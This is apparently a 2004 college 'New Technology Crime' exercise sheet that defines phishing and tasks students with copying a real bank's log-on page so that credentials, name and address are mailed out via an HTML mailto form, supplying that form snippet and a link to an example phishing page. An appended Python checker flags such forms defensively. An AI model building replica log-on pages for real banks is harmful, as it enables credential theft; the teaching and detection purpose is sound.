Lee Ellis (New Technology Crime)

EXERCISE 1: Set: 09.02.04 – Complete: 16.02.04

Background:

Phishing

(FISH.ing) pp. Creating a replica of an existing Web page to fool a user into submitting personal, financial, or password data. —adj.
—phisher n.

The term phishing comes from the fact that Internet scammers are using increasingly sophisticated lures as they "fish" for users' financial information and password data. The most common ploy is to copy the Web page code from a major site — such as AOL — and use that code to set up a replica page that appears to be part of the company's site. (This is why phishing is also called spoofing.) A fake e-mail is sent out with a link to this page, which solicits the user's credit card data or password. When the form is submitted, it sends the data to the scammer while leaving the user on the company's site so they don't suspect a thing.

Task:

Individually, locate a bank Web site (this can be an on-line bank or a high street bank) and go to the ‘log-on’ screen. This is the screen that requires the user to input name and password data. Copy the page, then re-design and code it (HTML) so that the data is sent to the following email address:

You may need to research HTML forms. In addition to the user log-on details, please ensure that a full name, house number and postcode are also submitted with the ‘form’. You should submit your name on the form to complete the exercise. Microsoft FrontPage or Macromedia Dreamweaver is provided by the college for Web design. Please ensure that you add this text to your page: “This is a fake Web page constructed as part of a training exercise”.

There is no need to upload or ‘publish’ your ‘phishing’ page. When previewing your page in Internet Explorer, you can submit the form details from there, if a connection to the Internet is established.

A working example of a phishing site can be found at:

http://myweb.tiscali.co.uk/uce_research/natw_pin.html

The pin number to access this page is: 4290

You may find this code useful:

<form name="email" method="POST" action="mailto:"
      onSubmit="return mailMe( this.form )" enctype="text/plain">
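Added example, not part of the original handout: a defender-side check in Python that parses a page's forms and flags the pattern described in the Background section, a form whose action is a mailto: address or a host other than the organisation's own. The names FormCollector and audit_forms, the host bank.example, the address collector@example.invalid and the sample markup are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: a replica log-on page whose form mails its fields out,
# followed by a form that posts back to the bank's own host.
SAMPLE = """
<form name="email" method="POST" action="mailto:collector@example.invalid" enctype="text/plain">
  <input type="text" name="user"><input type="password" name="pass">
</form>
<form method="POST" action="/login"><input type="password" name="pass"></form>
"""

class FormCollector(HTMLParser):
    """Record each <form>: its action and whether it contains a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []     # one dict per <form> seen
        self._open = None   # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": (a.get("action") or "").strip(), "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None and (a.get("type") or "").lower() == "password":
            self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit_forms(html, page_url, expected_host):
    """Return [(action, [reasons])] for forms that send data away from expected_host."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        # Resolve relative actions against the URL the page was served from.
        target = urlparse(urljoin(page_url, form["action"]))
        reasons = []
        if target.scheme == "mailto":
            reasons.append("action posts form data to an e-mail address")
        elif target.scheme in ("http", "https") and target.hostname != expected_host:
            reasons.append("action host %s is not %s" % (target.hostname, expected_host))
        if form["password"] and target.scheme == "http":
            reasons.append("password field submitted without HTTPS")
        if reasons:
            findings.append((form["action"], reasons))
    return findings
```

Calling audit_forms(SAMPLE, "https://bank.example/login.html", "bank.example") reports only the first form; a relative action on a page served from any other host is reported as a host mismatch.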

This exercise and everything covered by the new technology and crime lectures can be accessed online at:

http://myweb.tiscali.co.uk/uce_research/newtechcrime.html

or

http://myweb.tiscali.co.uk/uce_research/Bp.html